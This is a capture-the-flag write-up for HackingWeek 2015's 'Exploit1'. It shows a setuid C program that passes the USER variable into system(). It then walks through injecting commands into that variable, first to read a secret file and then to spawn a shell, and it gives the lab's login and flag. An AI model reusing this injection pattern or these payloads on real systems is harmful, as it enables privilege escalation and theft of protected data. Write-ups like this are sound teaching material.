[HackingWeek 2015] [Exploit1] Write UpDescription
Log on as guest (password: shu1eKoo) on machine 37.187.22.21.
You will find the hidden validation key in /home/exploit01/.secret.$> ssh guest@37.187.22.21
Resolution
We were given those files:
guest@ns314076:/home/exploit01/project$ ls -la
total 24 dr-xr-xr-x 2 exploit01 exploit01 4096 Apr 29 15:17 . dr-xr-xr-x 3 exploit01 exploit01 4096 Apr 29 15:18 .. -r--r--r-- 1 exploit01 exploit01 208 Apr 29 15:16 Makefile -r-sr-sr-x 1 exploit01 exploit01 5590 Apr 29 15:17 vulnerable -r--r--r-- 1 exploit01 exploit01 345 Apr 29 15:13 vulnerable.c
The source of the “vulnerable” binary is provided, let’s check it.
guest@ns314076:/home/exploit01/project$ cat vulnerable.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main()
{
char *buffer = NULL;
gid_t gid = getegid();
uid_t uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
asprintf(&buffer, "/bin/echo %s is using this program!", getenv("USER"));
system(buffer);
return EXIT_SUCCESS;
}
As we can see, the system() call executes everything passed in the &buffer through the USER environment variable.
By default, the $USER variable contains the current logged user.
guest@ns314076:/home/exploit01/project$ echo $USER
guest
So logically if we execute the binary, it will output guest:
guest@ns314076:/home/exploit01/project$ ./vulnerable
guest is using this program!
Now let’s replace “guest” by few commands, all separated by a semicolon.
We modify the USER variable to execute “/bin/echo me;cat ../.secret; echo is using this program!”:
guest@ns314076:/home/exploit01/project$ export USER='me;cat ../.secret; echo'
Then we relauch the program:
guest@ns314076:/home/exploit01/project$ ./vulnerable
me raht6ae1Ue is using this program!
Flag is raht6ae1Ue
By the way, if we wanted to get a shell, it would be possible using:
guest@ns314076:/home/exploit01/project$ export USER='me;/bin/sh;'
guest@ns314076:/home/exploit01/project$ ./vulnerable
me sh-4.2$ cat /home/exploit01/.secret raht6ae1Ue